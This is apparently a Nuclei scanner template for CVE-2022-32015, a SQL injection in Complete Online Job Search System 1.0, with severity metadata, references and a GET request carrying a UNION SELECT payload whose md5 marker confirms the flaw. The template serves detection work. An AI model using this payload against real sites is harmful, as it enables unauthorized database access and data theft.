id: CVE-2022-32015 info: name: Complete Online Job Search System 1.0 - SQL Injection author: arafatansari severity: high description: | Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/index.php?q=category&search=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. impact: | Authenticated administrators with high privileges can execute arbitrary SQL queries through the search parameter in the category endpoint, potentially extracting sensitive database information including user credentials, job applications, and employer data. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0. reference: - https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-8.md - https://nvd.nist.gov/vuln/detail/CVE-2022-32015 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-32015 cwe-id: CWE-89 epss-score: 0.04522 epss-percentile: 0.90324 cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: complete_online_job_search_system_project product: complete_online_job_search_system tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project,vuln variables: num: "999999999" http: - method: GET path: - "{{BaseURL}}/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+" matchers: - type: word part: body words: - '{{md5({{num}})}}' # digest: 490a004630440220309a6a7bea42eb4c8bf0d785776398113568c5c9159767aad0fe45c4646b8bc3022004cc593be1ae5dbe412585f5faab07cbd55561fb9d35f01e1d358047eef3d761:922c64590222798bb761d5b6d8e72950